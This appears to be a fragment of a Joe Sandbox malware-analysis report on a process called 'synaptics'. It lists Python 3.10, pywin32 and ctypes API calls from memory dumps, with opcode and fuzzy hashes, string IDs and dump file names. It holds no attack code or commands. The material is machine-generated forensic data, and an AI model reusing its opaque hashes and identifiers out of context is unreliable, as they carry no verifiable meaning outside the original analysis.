                                                                                                                                                                                                              • API String ID: 1259552197-1623945838
                                                                                                                                                                                                              • Opcode ID: dd897926b74e7a0bf54ba3c049fb2958a3db0fea0caf75106f2086e8e1276566
                                                                                                                                                                                                              • Instruction ID: b54d1629eb76213346726c42f1c2fa59d929c9766691d76a2acf9ae0f3ef816f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd897926b74e7a0bf54ba3c049fb2958a3db0fea0caf75106f2086e8e1276566
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB11C275600600ABC710CFE9D805786B7F4AF80769F244629E25DD7A41DB72E45A8BC9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0((idx>=1) && (idx<=10),src/AESNI.c,00000041), ref: 6BFC2BC2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3084730871.000000006BFC1000.00000020.00000001.01000000.00000031.sdmp, Offset: 6BFC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084621815.000000006BFC0000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084925591.000000006BFC3000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085116642.000000006BFC4000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085224740.000000006BFC5000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bfc0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassert
                                                                                                                                                                                                              • String ID: (idx>=1) && (idx<=10)$src/AESNI.c
                                                                                                                                                                                                              • API String ID: 3234217646-2495715787
                                                                                                                                                                                                              • Opcode ID: 39e3c877c37a9d91153fe85264adc8ec40b07b3a7ec86699c8a127c98a5147e0
                                                                                                                                                                                                              • Instruction ID: a4f96500f5c64797417a219ba34983f1475c873d097a7995e823479c1421cccb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39e3c877c37a9d91153fe85264adc8ec40b07b3a7ec86699c8a127c98a5147e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B113023CE819645EA56783C44D7883B2389EF36A4B20DB53F915F1437E76A6DC80063
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF48010: PyImport_ImportModule.PYTHON310(win32timezone,?,?,?,6BF487A6,?,6BF48B7A,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF48025
                                                                                                                                                                                                                • Part of subcall function 6BF48010: PyObject_GetAttrString.PYTHON310(00000000,TimeZoneInfo,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF4803A
                                                                                                                                                                                                                • Part of subcall function 6BF48010: _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF48051
                                                                                                                                                                                                                • Part of subcall function 6BF48010: PyTuple_New.PYTHON310(00000000,?,?,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF4805C
                                                                                                                                                                                                                • Part of subcall function 6BF48010: PyObject_CallMethod.PYTHON310(00000000,utc,6BF51365,?,?,?,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF48076
                                                                                                                                                                                                                • Part of subcall function 6BF48010: _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF4808A
                                                                                                                                                                                                                • Part of subcall function 6BF48010: _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF4809A
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(?,max,?,?,6BF48B7A,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF487CD
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,?,?,6BF48B7A,?), ref: 6BF48818
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Object_$AttrString$CallImportImport_MethodModuleTuple_
                                                                                                                                                                                                              • String ID: max
                                                                                                                                                                                                              • API String ID: 66079785-2641765001
                                                                                                                                                                                                              • Opcode ID: 17fd44131f69eb9ac1d2e4106884ea615a6fdbd38deb10cd51c5debd1a6678b3
                                                                                                                                                                                                              • Instruction ID: 7b75626d2601e4a2c3504fbd4a32b664cae47cf0fa917a6f152c312196ca2dd0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17fd44131f69eb9ac1d2e4106884ea615a6fdbd38deb10cd51c5debd1a6678b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D701D477510031ABC3509B5DDC40AB67BECEF5972631981A5F488CA1A2E22ECD97D3B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,args not a tuple?), ref: 6C0A62CF
                                                                                                                                                                                                              • PySequence_SetItem.PYTHON310(?,00000000,?), ref: 6C0A62F6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_ItemSequence_String
                                                                                                                                                                                                              • String ID: args not a tuple?
                                                                                                                                                                                                              • API String ID: 138718260-274370407
                                                                                                                                                                                                              • Opcode ID: f0f0427e30d81fceb339b6b0a2d1e7e292d2fc3caacbf157dff6ab12d52239d8
                                                                                                                                                                                                              • Instruction ID: 98f0cc3cabb59bacb02f244afb444941dc7da7ecf2677260dbe821603ce3fea0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0f0427e30d81fceb339b6b0a2d1e7e292d2fc3caacbf157dff6ab12d52239d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02F0A433705014ABDB108ADDEC80AC5F7F9EF81239B154762FA2DC6591D732E46A8791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??0PyOVERLAPPED@@QAE@PBVsMyOverlapped@0@@Z.PYWINTYPES310(?), ref: 6BF45756
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EADFC,Allocating pOverlapped,?), ref: 6BF4576E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_Overlapped@0@@String
                                                                                                                                                                                                              • String ID: Allocating pOverlapped
                                                                                                                                                                                                              • API String ID: 1062433786-1485247442
                                                                                                                                                                                                              • Opcode ID: 4e57c1ff150ebb0e3b89a15524abdfde2d5054cfda9aa2c185c73a53ee368bb5
                                                                                                                                                                                                              • Instruction ID: b7ceabf2dee692fbe72c30ac4af701f8f2aa9aec91211579b7695011a8da4617
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e57c1ff150ebb0e3b89a15524abdfde2d5054cfda9aa2c185c73a53ee368bb5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1801FC329283058FC705DF28D80176A7BE4EB59344F0042ADF94897262E735D5548BC2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:SECURITY_ATTRIBUTES,80D07A71,?,?,6BF4D954,000000FF), ref: 6BF45C9B
                                                                                                                                                                                                              • ??0PySECURITY_ATTRIBUTES@@QAE@XZ.PYWINTYPES310 ref: 6BF45CCD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_ParseTuple
                                                                                                                                                                                                              • String ID: :SECURITY_ATTRIBUTES
                                                                                                                                                                                                              • API String ID: 3371842430-781453600
                                                                                                                                                                                                              • Opcode ID: 45692648760a1e69eb0f238f9920da0f98ad095274e04f5d6aaf6f629a03d318
                                                                                                                                                                                                              • Instruction ID: e39476fa90b94fe02e3a9a71eb5e3003838e681152a7f1b01fd36c95b930f9ca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45692648760a1e69eb0f238f9920da0f98ad095274e04f5d6aaf6f629a03d318
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51F0C873D48548ABDB04DF54DC01B69BBB4EB04714F00467DEC1983791EB3A5914C751
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.wstring_at,6C0B180C,?,?), ref: 6C0A7E87
                                                                                                                                                                                                              • PyUnicode_FromWideChar.PYTHON310(?,?), ref: 6C0A7EB5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AuditCharFromSys_Unicode_Wide
                                                                                                                                                                                                              • String ID: ctypes.wstring_at
                                                                                                                                                                                                              • API String ID: 614261396-2169766756
                                                                                                                                                                                                              • Opcode ID: eb6c671ba290a9a7bb18bfbeed3f0eca895aa3ff6b9652814de5da408f86bea2
                                                                                                                                                                                                              • Instruction ID: d25a2c8b82987cf833ac75d875f1db8e116aa0f4533f9f1a8c5117cc352967f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb6c671ba290a9a7bb18bfbeed3f0eca895aa3ff6b9652814de5da408f86bea2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00F02E379040146747109ADDAC049D77BFCDE852797054A61FD1DA3541F6325D1186E0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyObject_GenericSetAttr.PYTHON310(?,?,?), ref: 6C0A1E6E
                                                                                                                                                                                                              • _PyUnicode_EqualToASCIIString.PYTHON310(?,_fields_), ref: 6C0A1E93
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttrEqualGenericObject_StringUnicode_
                                                                                                                                                                                                              • String ID: _fields_
                                                                                                                                                                                                              • API String ID: 947992268-3196300388
                                                                                                                                                                                                              • Opcode ID: bc97ec0e647b7cd6e7e2c4cafec1502f0806e854bd839cca478d36d1b9bbeafb
                                                                                                                                                                                                              • Instruction ID: fe3e5b913b301a7f468694e802d1f7e322d90c9cf7edf12f51ac7fe4075d930c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc97ec0e647b7cd6e7e2c4cafec1502f0806e854bd839cca478d36d1b9bbeafb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBF0BE71A08248ABCF00CEE4ED05BCA3BA8EF012B9F044520FD1D82641D732E520D6D5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,lllOOO:AddAccessAllowedObjectAce,?,?,?,?,?), ref: 6BF42BE9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • AddAccessAllowedObjectAce, xrefs: 6BF42C03
                                                                                                                                                                                                              • lllOOO:AddAccessAllowedObjectAce, xrefs: 6BF42BE0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_ParseTuple
                                                                                                                                                                                                              • String ID: AddAccessAllowedObjectAce$lllOOO:AddAccessAllowedObjectAce
                                                                                                                                                                                                              • API String ID: 3371842430-684429688
                                                                                                                                                                                                              • Opcode ID: 9ccd8a3def1c2000f26abfc7856c64be1a8629cc5f5a565de6816c8f28282b9d
                                                                                                                                                                                                              • Instruction ID: 3c5685cba9598bdc31e77052a7f5aeb49e463928945b30b81dab3b15a43a70a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ccd8a3def1c2000f26abfc7856c64be1a8629cc5f5a565de6816c8f28282b9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94F0EC77408205ABC702EE44CC41C9BBFEABB98244F844A69F589D1132E736D6689B92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Buffer cannot be None), ref: 6BF41190
                                                                                                                                                                                                              • PyObject_GetBuffer.PYTHON310(?,?,?), ref: 6BF411AB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BufferErr_Object_String
                                                                                                                                                                                                              • String ID: Buffer cannot be None
                                                                                                                                                                                                              • API String ID: 3626572750-305949699
                                                                                                                                                                                                              • Opcode ID: 13fa3633e2487492d107e55e06fec18ee4388091f62de78c07f791d11dde4366
                                                                                                                                                                                                              • Instruction ID: 9033c8cbe5eee6fedff3bed210cf85e5a6c81488bf295c1a8a06544154244161
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13fa3633e2487492d107e55e06fec18ee4388091f62de78c07f791d11dde4366
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7FF0F0326242219BD714DF08D804BABBFE49B96305F00885EF095C7626C334C9A8C791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,lllOOO:AddAccessDeniedObjectAce,?,?,?,?,?), ref: 6BF42C59
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • lllOOO:AddAccessDeniedObjectAce, xrefs: 6BF42C50
                                                                                                                                                                                                              • AddAccessDeniedObjectAce, xrefs: 6BF42C73
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_ParseTuple
                                                                                                                                                                                                              • String ID: AddAccessDeniedObjectAce$lllOOO:AddAccessDeniedObjectAce
                                                                                                                                                                                                              • API String ID: 3371842430-3179976129
                                                                                                                                                                                                              • Opcode ID: c1047f5d2079d47634e140b650cfb184195adb6fd8cffcb993ebc057629cdf5d
                                                                                                                                                                                                              • Instruction ID: 1d95ae9f3de98d277551aa7669bcc24089973f91a0c6a7ab8ab322ccfaf19721
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1047f5d2079d47634e140b650cfb184195adb6fd8cffcb993ebc057629cdf5d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41F0AF77418205BBD702EE44CC41C9BBFFAFF98244F840969F68991132E736D6689B93
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6BF44BFC
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(RegCloseKey,00000000), ref: 6BF44C15
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuildCloseDecodeErrorError@@FormatLastMessageSizeU_object@@Unicode_Value_Win_
                                                                                                                                                                                                              • String ID: RegCloseKey
                                                                                                                                                                                                              • API String ID: 3116279299-2838036789
                                                                                                                                                                                                              • Opcode ID: 5a09977c033e67b43c7668227702847de02724431253f6f060159ae0fe4ce5fe
                                                                                                                                                                                                              • Instruction ID: b7902b6b9cc027422739d4d447f1decb886c9badf9828504450b1c075a408854
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a09977c033e67b43c7668227702847de02724431253f6f060159ae0fe4ce5fe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAE09233E21A32168614597E7808B87EFC4AF44A71B06C266AD18E3315DB6CCC018AE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:OVERLAPPED), ref: 6BF455EA
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310 ref: 6BF45624
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_ParseReferenceTuple
                                                                                                                                                                                                              • String ID: :OVERLAPPED
                                                                                                                                                                                                              • API String ID: 709158290-1552635527
                                                                                                                                                                                                              • Opcode ID: 985cdb0b23104347c94a2f004980ae22b3ca7ea5cca4328ea4e413198d1433b2
                                                                                                                                                                                                              • Instruction ID: dfd023b3fa403f02aa464116d67723af4c3ea83a58d8cf3d32bcd28cbd563c55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 985cdb0b23104347c94a2f004980ae22b3ca7ea5cca4328ea4e413198d1433b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97F0BB72820B114FD3209F26D8047577BE4EF5531DF10CA0DF48A45961E7B9A1948F90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyLong_FromSsize_t.PYTHON310(?), ref: 6C0AAD05
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,no alignment info), ref: 6C0AAD2F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_FromLong_Ssize_tString
                                                                                                                                                                                                              • String ID: no alignment info
                                                                                                                                                                                                              • API String ID: 934680410-401610513
                                                                                                                                                                                                              • Opcode ID: baaae90d245b7428424f076a60cfa02e640deb77c90c729f6b1654ababc4d160
                                                                                                                                                                                                              • Instruction ID: aa7236acfbdaf4b561a278ca7ef8893b21c8746459572d5a2de1fef96bac62f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: baaae90d245b7428424f076a60cfa02e640deb77c90c729f6b1654ababc4d160
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09F05E706451048FEF00DF94DA4AB5437F8BB0060AF2888A4E54E9B9A3CB33E416CF15
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyCapsule_Import.PYTHON310(datetime.datetime_CAPI,00000000), ref: 6BF48B97
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6BF5A0A8), ref: 6BF48BDF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Capsule_ImportReadyType_
                                                                                                                                                                                                              • String ID: datetime.datetime_CAPI
                                                                                                                                                                                                              • API String ID: 2581296196-711417590
                                                                                                                                                                                                              • Opcode ID: caebe3bc0cf508aeac89208eaf98d203d386fb0d2e57d22f495e7c4a36a902e1
